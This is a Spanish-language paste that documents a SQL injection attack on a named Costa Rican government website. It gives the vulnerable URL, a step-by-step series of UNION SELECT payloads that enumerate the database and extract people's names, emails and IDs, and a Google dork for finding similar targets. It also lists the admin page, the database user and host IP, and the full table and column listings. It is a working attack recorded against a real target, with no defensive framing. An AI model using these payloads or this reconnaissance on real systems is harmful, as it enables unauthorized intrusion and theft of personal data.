Untitled

Datos extraídos mediante SQL Injection:

Vulnerabilidad: SQL Injection Simple.
URL Vulnerable: http://inm.go.cr/principal/eventos/verEventos.php?id=66
Sintaxis: order by 5
          order by 10
          -66 union all select 1,2,3,4,5--
          -66 union all select 1,group_concat(version(),0x3a7e,@@datadir,0x3a7e,database(),0x3a7e,user()),3,4,5--
          -66 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema = database()--
          -66 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name = 0x7065726d69736f5f61646d696e--
          -66 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name = 0x6c696e6b--
          -66 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name = 0x726567697374726f706572736f6e617320--
          -66 union all select 1,concat(nombre,0x3a7e,email,0x3a7e,cod_persona),3,4,5 from registropersonas--

Google Dork: site: inm.go.cr & allinurl:php?id or inurl:php?id
Página del administrador: www.inm.go.cr/admin/

Versión MySQL: 5.0.96-log
Directorio MySQL: /var/lib/mysql_data/2/
Base de datos: principalinm
Usuario de la base de datos: principalinm@45.40.166.149

Tablas de la base de datos:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ album                              ~
~ beca                               ~
~ carrera                            ~
~ contacto                           ~
~ director_evento                    ~
~ docs_formularios_aplicacion        ~
~ docs_formularios_becas             ~
~ docs_patrocinios                   ~
~ docs_programas                     ~
~ estudio                            ~
~ evento                             ~
~ fecha_evento                       ~
~ fechas_importantes                 ~
~ inicio                             ~
~ institucion                        ~
~ link                               ~
~ menu1                              ~
~ menu2                              ~
~ menu3                              ~
~ patrocinador                       ~
~ patrocinio                         ~
~ permiso_admin                      ~
~ programa                           ~
~ programa_patrocinio                ~
~ registropersonas                   ~
~ repertorio                         ~
~ solista                            ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

En total son 27 tablas.

Columnas de la tabla registropersonas:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ cod_persona                        ~
~ nombre                             ~
~ 1_apellido                         ~
~ 2_apellido                         ~
~ sexo                               ~
~ email                              ~
~ estado                             ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

En total son 7 columnas.